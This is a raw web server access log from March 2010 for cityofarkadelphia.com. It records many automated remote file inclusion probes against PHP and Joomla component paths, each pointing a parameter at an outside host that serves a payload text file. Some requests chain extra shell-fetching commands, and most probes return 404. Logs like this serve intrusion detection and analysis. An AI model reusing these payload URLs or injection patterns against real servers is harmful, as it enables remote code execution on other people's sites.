95.131.66.198 - - [01/Mar/2010:01:56:22 -0800] "GET /logs/access_090201.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:01:56:24 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 200 4232 "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:01:56:24 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
116.127.121.117 - - [01/Mar/2010:01:56:24 -0800] "GET /logs/access_090901.log//?_SERVER[DOCUMENT_ROOT]=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:01:56:37 -0800] "GET /logs/access_090201.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
95.131.66.198 - - [01/Mar/2010:01:57:17 -0800] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.37.143.198 - - [01/Mar/2010:02:05:02 -0800] "GET /logs/access_090401.log//mcf.php?content=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.37.143.198 - - [01/Mar/2010:02:05:02 -0800] "GET /logs//mcf.php?content=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.37.143.198 - - [01/Mar/2010:02:05:02 -0800] "GET /mcf.php?content=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.46.195.226 - - [01/Mar/2010:02:06:46 -0800] "GET /?S=A HTTP/1.1" 200 917 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:02:17:08 -0800] "GET /logs/access_091201.log//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:02:17:08 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:02:17:09 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:02:18:08 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:02:18:08 -0800] "GET /logs/access_091201.log//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:02:18:13 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:02:19:12 -0800] "GET /logs/access_081230.log//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:02:20:24 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:02:20:24 -0800] "GET /logs/access_091231.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:02:20:24 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:02:20:26 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:02:20:26 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:02:20:26 -0800] "GET /logs/access_091231.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:02:20:59 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:02:20:59 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:02:20:59 -0800] "GET /logs/access_091231.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.44.84.221 - - [01/Mar/2010:02:21:04 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:02:21:04 -0800] "GET /logs/access_081230.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.44.84.221 - - [01/Mar/2010:02:21:04 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.44.84.221 - - [01/Mar/2010:02:21:04 -0800] "GET /logs/access_091231.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.44.84.221 - - [01/Mar/2010:02:21:12 -0800] "GET /logs/access_081230.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.44.84.221 - - [01/Mar/2010:02:21:33 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.44.84.221 - - [01/Mar/2010:02:21:33 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.44.84.221 - - [01/Mar/2010:02:21:33 -0800] "GET /logs/access_091231.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
72.44.84.221 - - [01/Mar/2010:02:21:38 -0800] "GET /logs/access_081230.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:02:29:57 -0800] "GET /logs/access_100101.log//init_basic.php?GALLERY_BASEDIR=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:02:29:57 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:02:29:57 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:02:35:03 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:02:35:03 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:02:35:03 -0800] "GET /logs/access_100101.log//init_basic.php?GALLERY_BASEDIR=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:02:37:14 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:02:37:14 -0800] "GET /logs/access_100101.log//init_basic.php?GALLERY_BASEDIR=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:02:37:15 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:02:38:30 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:02:38:30 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:02:38:30 -0800] "GET /logs/access_091231.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:02:39:24 -0800] "GET /logs/access_091101.log//init_basic.php?GALLERY_BASEDIR=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:02:44:10 -0800] "GET /logs/access_090901.log//allopass.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:02:44:10 -0800] "GET /logs//allopass.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:02:44:11 -0800] "GET /allopass.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:02:44:24 -0800] "GET /logs/access_090329.log//allopass.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:02:45:31 -0800] "GET /allopass.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:02:45:31 -0800] "GET /logs//allopass.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:02:45:32 -0800] "GET /logs/access_090901.log//allopass.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:02:45:42 -0800] "GET /logs/access_090329.log//allopass.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.29.250 - - [01/Mar/2010:02:46:03 -0800] "GET /components/minibb/index.php?absolute_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.29.250 - - [01/Mar/2010:02:46:03 -0800] "GET /logs/access_090701.log//components/minibb/index.php?absolute_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.29.250 - - [01/Mar/2010:02:46:04 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.29.250 - - [01/Mar/2010:02:46:04 -0800] "GET /logs/access_090329.log//components/minibb/index.php?absolute_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:02:56:04 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:02:56:04 -0800] "GET /logs/access_091231.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:02:56:04 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:02:59:12 -0800] "GET /logs/access_090101.log//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:02:59:12 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:02:59:12 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.46.204.239 - - [01/Mar/2010:03:00:12 -0800] "GET /logs/access_090401.log HTTP/1.1" 200 512975 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
218.55.227.145 - - [01/Mar/2010:03:02:15 -0800] "GET /logs/access.log//sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.55.227.145 - - [01/Mar/2010:03:02:15 -0800] "GET /sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.55.227.145 - - [01/Mar/2010:03:02:17 -0800] "GET /logs//sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.55.227.145 - - [01/Mar/2010:03:03:33 -0800] "GET /core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.55.227.145 - - [01/Mar/2010:03:03:33 -0800] "GET /logs/access_100101.log//core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.55.227.145 - - [01/Mar/2010:03:03:33 -0800] "GET /logs//core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.29.250 - - [01/Mar/2010:03:07:02 -0800] "GET /sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.29.250 - - [01/Mar/2010:03:07:18 -0800] "GET /logs//sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
123.143.29.250 - - [01/Mar/2010:03:07:18 -0800] "GET /logs/access.log//sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.55.227.145 - - [01/Mar/2010:03:13:45 -0800] "GET /logs/access_090201.log//core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.207.131.138 - - [01/Mar/2010:03:14:11 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
67.207.131.138 - - [01/Mar/2010:03:14:11 -0800] "GET /logs/access_090101.log%22%20%20target=%22_blank/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
67.207.131.138 - - [01/Mar/2010:03:14:11 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
67.207.131.138 - - [01/Mar/2010:03:14:11 -0800] "GET /logs/access_090330.log%22%20%20target=%22_blank/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
61.111.3.35 - - [01/Mar/2010:03:14:24 -0800] "GET /logs/access.log//sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.111.3.35 - - [01/Mar/2010:03:14:24 -0800] "GET /logs//sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.111.3.35 - - [01/Mar/2010:03:14:24 -0800] "GET /sitemap.xml.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.207.131.138 - - [01/Mar/2010:03:15:09 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
67.207.131.138 - - [01/Mar/2010:03:15:09 -0800] "GET /logs/access_090101.log%22%20%20target=%22_blank/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
67.207.131.138 - - [01/Mar/2010:03:15:09 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
67.207.131.138 - - [01/Mar/2010:03:15:09 -0800] "GET /logs/access_090330.log%22%20%20target=%22_blank/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
67.207.131.138 - - [01/Mar/2010:03:15:14 -0800] "GET /logs/access_090101.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
67.207.131.138 - - [01/Mar/2010:03:15:21 -0800] "GET /logs/access_090330.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
67.195.110.164 - - [01/Mar/2010:03:15:37 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
67.195.110.164 - - [01/Mar/2010:03:15:37 -0800] "GET /?M=D HTTP/1.0" 200 901 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:03:16:21 -0800] "GET /logs//lang_main_album.php?phpbb_admin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:03:16:21 -0800] "GET /logs/access_081101.log%20%20//lang_main_album.php?phpbb_admin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:03:16:21 -0800] "GET /lang_main_album.php?phpbb_admin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.207.131.138 - - [01/Mar/2010:03:16:26 -0800] "GET /logs/access_090101.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:03:17:08 -0800] "GET /logs/access_081101.log%20%20//lang_main_album.php?phpbb_admin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:03:17:08 -0800] "GET /logs//lang_main_album.php?phpbb_admin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:03:17:08 -0800] "GET /lang_main_album.php?phpbb_admin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.207.131.138 - - [01/Mar/2010:03:17:21 -0800] "GET /logs/access_090330.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "cityofarkadelphia.com"
218.55.227.145 - - [01/Mar/2010:03:18:00 -0800] "GET /extadminmenus.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.55.227.145 - - [01/Mar/2010:03:18:00 -0800] "GET /logs//extadminmenus.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.55.227.145 - - [01/Mar/2010:03:18:01 -0800] "GET /logs/access_090201.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:03:18:10 -0800] "GET /logs/access_081230.log//lang_main_album.php?phpbb_admin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:03:18:32 -0800] "GET /logs/access_090501.log//lang_main_album.php?phpbb_admin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:03:18:50 -0800] "GET /logs/access_081230.log//lang_main_album.php?phpbb_admin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:03:18:56 -0800] "GET /logs/access_090501.log//lang_main_album.php?phpbb_admin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
219.133.62.73 - - [01/Mar/2010:03:19:27 -0800] "GET / HTTP/1.1" 200 917 "-" "Jakarta Commons-HttpClient/3.1-rc1" "cityofarkadelphia.com"
218.55.227.145 - - [01/Mar/2010:03:19:31 -0800] "GET /logs/access_100201.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.93.147.154 - - [01/Mar/2010:03:20:53 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
